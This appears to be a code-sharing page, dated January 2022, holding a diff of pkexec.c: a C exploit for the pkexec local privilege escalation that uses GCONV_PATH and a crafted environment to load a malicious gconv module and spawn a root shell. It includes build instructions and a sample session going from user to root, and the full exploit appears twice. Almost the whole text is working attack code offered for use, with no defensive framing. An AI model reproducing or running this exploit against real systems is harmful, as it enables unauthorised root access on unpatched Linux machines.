darrenmartyn · January 26, 2022 08:55
diff --git a/pkexec.c b/pkexec.c
 /*
 * For original see haxx.in/files/blasty-vs-pkexec.c
 *
 * this version is just using some awful hack to
 * avoid having to call gcc on the target box.
 * this versions fragile - must be named payload.so
 * might add better detection later, whatever.
 * all credit to bl4sty for the actual exploit, 
 * I just made some changes for my usecase.
 * you will have to change the interp for diff
 * architectures, I'm sure you can work it out.
 * - dmartyn
 * $ gcc -o payload.so -fPIC -shared hax.c -lc -ldl -Wl,-e,lol
 * $ whoami
 * user
 * $ ./payload.so 
 * [~] maybe get shell now?
 * # whoami
 * root
 * # 
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <sys/stat.h>
 #include <sys/types.h>
 #include <fcntl.h>

 const char my_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";


 void fatal(char *f) {
    perror(f);
    exit(-1);
 }


 void gconv() {
  return;
 }
 void gconv_init() {
  setuid(0); seteuid(0); setgid(0); setegid(0);
  static char *a_argv[] = { "sh", NULL };
  static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
  execve("/bin/sh", a_argv, a_envp);
  exit(0);
 }


 int lol(int argc, char *argv[]) {
    struct stat st;
    char *a_argv[]={ NULL };
    char *a_envp[]={
        "lol",
        "PATH=GCONV_PATH=.",
        "LC_MESSAGES=en_US.UTF-8",
        "XAUTHORITY=../LOL",
        NULL
    };


    if (stat("GCONV_PATH=.", &st) < 0) {
        if(mkdir("GCONV_PATH=.", 0777) < 0) {
            fatal("mkdir");
        }
        int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777); 
        if (fd < 0) {
            fatal("open");
        }
        close(fd);
    }

    if (stat("lol", &st) < 0) {
        if(mkdir("lol", 0777) < 0) {
            fatal("mkdir");
        }
        FILE *fp = fopen("lol/gconv-modules", "wb");
        if(fp == NULL) {
            fatal("fopen");
        }
        fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
        fclose(fp);
    }

    printf("[~] maybe get shell now?\n");

    execve("/usr/bin/pkexec", a_argv, a_envp);
 }
	/*
	* For original see haxx.in/files/blasty-vs-pkexec.c
	*
	* this version is just using some awful hack to
	* avoid having to call gcc on the target box.
	* this versions fragile - must be named payload.so
	* might add better detection later, whatever.
	* all credit to bl4sty for the actual exploit,
	* I just made some changes for my usecase.
	* you will have to change the interp for diff
	* architectures, I'm sure you can work it out.
	* - dmartyn
	* $ gcc -o payload.so -fPIC -shared hax.c -lc -ldl -Wl,-e,lol
	* $ whoami
	* user
	* $ ./payload.so
	* [~] maybe get shell now?
	* # whoami
	* root
	* #
	*/
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/stat.h>
	#include <sys/types.h>
	#include <fcntl.h>

	const char my_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";


	void fatal(char *f) {
	perror(f);
	exit(-1);
	}


	void gconv() {
	return;
	}
	void gconv_init() {
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	execve("/bin/sh", a_argv, a_envp);
	exit(0);
	}


	int lol(int argc, char *argv[]) {
	struct stat st;
	char *a_argv[]={ NULL };
	char *a_envp[]={
	"lol",
	"PATH=GCONV_PATH=.",
	"LC_MESSAGES=en_US.UTF-8",
	"XAUTHORITY=../LOL",
	NULL
	};


	if (stat("GCONV_PATH=.", &st) < 0) {
	if(mkdir("GCONV_PATH=.", 0777) < 0) {
	fatal("mkdir");
	}
	int fd = open("GCONV_PATH=./lol", O_CREAT\|O_RDWR, 0777);
	if (fd < 0) {
	fatal("open");
	}
	close(fd);
	}

	if (stat("lol", &st) < 0) {
	if(mkdir("lol", 0777) < 0) {
	fatal("mkdir");
	}
	FILE *fp = fopen("lol/gconv-modules", "wb");
	if(fp == NULL) {
	fatal("fopen");
	}
	fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
	fclose(fp);
	}

	printf("[~] maybe get shell now?\n");

	execve("/usr/bin/pkexec", a_argv, a_envp);
	}